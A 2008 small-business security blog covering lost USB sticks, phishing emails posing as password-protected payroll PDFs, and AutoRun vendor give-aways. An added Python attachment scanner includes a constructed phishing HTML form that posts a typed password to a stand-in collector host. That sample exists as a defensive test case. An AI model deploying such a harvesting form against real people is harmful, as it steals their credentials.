The Honey Stick Project


Practical security help for small business managers - The Streetwise Security Zone

Posted in Understanding the Risks, tips by Administrator on September 1st, 2008

It’s time to get streetwise about information security. One of the areas in which I think the security industry has been weak has been in giving small businesses affordable and practical tools for sifting through the mound of technical mumbo-jumbo created each day on the Web.

I imagine that they must feel a bit like high school teenagers walking into a baby’s clothing store… They don’t have much interest, even though - someday soon - they know they will need to know about the stuff.

The Honey Stick Project was my first attempt to raise awareness among small business managers and others who should be aware of the real risks in today’s information world. I still have some new ideas for testing the psychology of how people think about mobile storage devices they find or lose. But the small business problem is much bigger than this, in my view.

Funny, I’ve never received a password protected PDF from payroll before…

Posted in Privacy, Understanding the Risks, tips by Administrator on May 7th, 2008

Here’s a simple tip that can save you a lot of trouble.

DON’T ENTER PASSWORDS WHERE YOU AREN’T EXPECTING THEM!!!

I recently came across a suspicious email in my spam folder. It appeared to be from a payroll service I’ve actually dealt with. There was almost no way to tell for sure if it was from them.

The subject line included a recent date and the word “Paystub”. There was a PDF attachment and even with image loading turned off, there was a label that said “This PDF is password protected”. It had a single field with the word “Password” beside it.

I have yet to determine if this email was authentic or a real phishing attack, aimed at gathering passwords. But if this is a phishing attack, here’s what could happen if I entered a password:

  1. The password gets collected, and an error message is produced saying “Invalid password, please try again”.  Knowing that we should all be using different passwords for each site or program “to be secure”, I may simply think I should have used one of my other dozen passwords (don’t we all use that many password variations?!)
  2. Hitting “Enter” or clicking on a button causes the password to be sent back to a mothership, including enough information for them to identify my email address as being valid.
  3. Not only do they now know that this email address is valid, but they have at least one version of my password. If I tried several different ones, they could have them all.

This is dangerous because people think they “NEED TO SEE WHAT’S INSIDE” the encrypted email. It’s like arriving at your office with a wrapped package that has lots of heavy tape sealing it up. The more tape there is protecting it, the more you want to open it to see what it is that could be so sensitive.

To make things worse, there aren’t a lot of easy ways to automatically check for the authenticity of such a package. It can have a digital signature on it, which you could verify. But there are a lot of usability issues yet to be solved in verifying digital signatures in the wild. Enterprises that use Public Key Infrastructure regularly would have an easier time letting people ensure the authenticity of emails and attachments. But most people won’t have that luxury.

So, if you aren’t expecting to be asked for a password (even on a website - which can effectively trick you the same way) you should call up somebody in the originating organization to verify that it is valid, and that it is important. I would also notify them that they should not present password protected information without an easy way to securely verify that it is real.

I am actually surprised that I haven’t seen more evidence of this type of phishing, but I’m sure we will in the future.
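The “password protected PDF” described above is a disguise that can be checked mechanically rather than by eye: a real encrypted PDF starts with the `%PDF-` header and carries an `/Encrypt` entry, and the viewer prompts for the password itself, whereas a credential-harvesting attachment is usually an HTML page with a password field whose form posts somewhere. The following Python scanner is an added example, not code from the original post: it parses a raw email, decodes each attachment and classifies it by its bytes rather than by its filename or declared content type. The sender and recipient addresses, the collector URL and both attachments are constructed for the example.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

# Patterns for the tell-tale parts of a credential-harvesting "attachment".
PASSWORD_INPUT = re.compile(rb"<input[^>]*type\s*=\s*['\"]?password", re.I)
FORM_ACTION = re.compile(rb"<form[^>]*action\s*=\s*['\"]?([^'\"\s>]+)", re.I)
MARKUP_START = re.compile(rb"<\s*(html|body|form|script)\b", re.I)


def classify_attachment(filename, data):
    """Work out what an attachment really is from its bytes, not its name."""
    body = data.lstrip()
    finding = {"filename": filename, "kind": "other", "form_action": None}
    if body.startswith(b"%PDF-"):
        # A genuinely password-protected PDF carries an /Encrypt entry and the
        # viewer prompts for the password; it never needs a web form.
        finding["kind"] = "pdf-encrypted" if b"/Encrypt" in body else "pdf-plain"
    elif MARKUP_START.search(body):
        finding["kind"] = "html"
        if PASSWORD_INPUT.search(body):
            # The form around the password field tells you where the typed password goes.
            finding["kind"] = "html-password-form"
            m = FORM_ACTION.search(body)
            if m:
                finding["form_action"] = m.group(1).decode("latin-1")
    return finding


def scan_message(raw):
    """Return one finding per attachment of a raw RFC 822 message."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        finding = classify_attachment(part.get_filename() or "<unnamed>", data)
        finding["declared_type"] = part.get_content_type()
        name = finding["filename"].lower()
        # Either a password form, or a ".pdf" whose bytes are not a PDF, is the tell.
        finding["suspicious"] = (
            finding["kind"] == "html-password-form"
            or (name.endswith(".pdf") and not finding["kind"].startswith("pdf"))
        )
        findings.append(finding)
    return findings


def build_sample(filename, maintype, subtype, payload):
    """Constructed test message (not real mail) so the scanner can run offline."""
    msg = EmailMessage()
    msg["From"] = "payroll@example.invalid"  # hypothetical sender
    msg["To"] = "me@example.invalid"         # hypothetical recipient
    msg["Subject"] = "Paystub 2008-05-07"
    msg.set_content("Your pay stub is attached. This PDF is password protected.")
    msg.add_attachment(payload, maintype=maintype, subtype=subtype, filename=filename)
    return bytes(msg)


# Constructed phishing "PDF": really an HTML page with a password form that posts
# to a hypothetical collector host.
PHISH_HTML = (b"<html><body>This PDF is password protected.\n"
              b'<form action="http://collector.example.invalid/open" method="post">\n'
              b'Password: <input type="password" name="pw"> <input type="submit">\n'
              b"</form></body></html>\n")

# Constructed skeleton of a real encrypted PDF: just the header and a trailer with
# an /Encrypt entry, enough to exercise the checks (not a complete, viewable file).
ENCRYPTED_PDF = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
                 b"trailer\n<< /Root 1 0 R /Encrypt 2 0 R >>\n%%EOF\n")

PHISH_MSG = build_sample("Paystub.pdf", "application", "pdf", PHISH_HTML)
LEGIT_MSG = build_sample("Paystub.pdf", "application", "pdf", ENCRYPTED_PDF)

if __name__ == "__main__":
    for label, raw in (("phish", PHISH_MSG), ("legit", LEGIT_MSG)):
        for finding in scan_message(raw):
            print(label, finding)
```

Treat this as a first filter, not a verdict: a genuine PDF can itself contain a form or script that submits data to a URL, and the same bait can arrive as an .html attachment or a link, so the advice above (phone the sender before typing anything) still applies when the scanner says “pdf-encrypted”.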

Beware security vendors (or anyone) bearing gifts with a USB plug

Posted in Stories about Mobile Data Risks, tips by Administrator on March 20th, 2008

There apparently is a rule-book somewhere that says “Never give a woman a gift with a cord or a handle, unless it is a purse filled with money…” The rationale is that the gesture will very likely be taken the wrong way by the recipient, possibly with thoughts of, “You expect me to do housework for the rest of my life?”

Most men only have to make this mistake once to understand the gravity of such a well-intentioned act of generosity. You can also see the effects of such a faux-pas by watching the movie “Father of the Bride” with Steve Martin, where the bride-to-be has a meltdown when the groom gives her a blender as a wedding gift. Dad had to explain to her that it was actually well-intentioned gift, with the thought that maybe someday she’d want to “blend something”…

Now consider the following gift-giving situation in the business world, which was nicely documented by William Jackson at “Government Security News” in July 2007. A vendor called Senforce distributed a number of U3 USB drives (a type of memory stick that presents part of itself to Windows as a CD-ROM, so that a program stored on it can start automatically through AutoRun) as a marketing give-away, and with William it fulfilled its intended purpose perfectly. The intent, apparently, was to raise awareness of how risky it is to plug unknown devices into your computer. He found that the device had been configured with a “supposedly” harmless program that used loopholes in the Windows architecture (the automatic launch U3 drives get is the obvious one) to demonstrate how easily data could be extracted from your computer, in an exploit that Senforce called “Thumbsucking”.

Leaving a calling card on your memory stick can enable recovery

Posted in tips by Administrator on February 28th, 2008

One thing I’m observing from the early results of the Honey Stick Project (HSP) is that a significant number of people are trying to find out how to locate the owner of the device they have found.

In Stream 0, there are no outside markings with contact information. In the first two cases of people making contact, they took enough care in opening the files that they didn’t trigger a request to the website, and were not tracked. They did find a plain text file entitled “owner_contact_info.txt”, which contained a phone number, email address and physical address, as well as the HSP website address.

Both finders called the phone number to indicate that they had found the device, and were presumably willing to return it. So, it may facilitate recovery to some extent if you have such a file on your mobile device with enough information to enable somebody to contact you if they find it. Of course, depending on the type of information on the device and on your sensitivity to being identified, you may not want to divulge any personal information, as you don’t know if the potential finder will have good or bad intentions.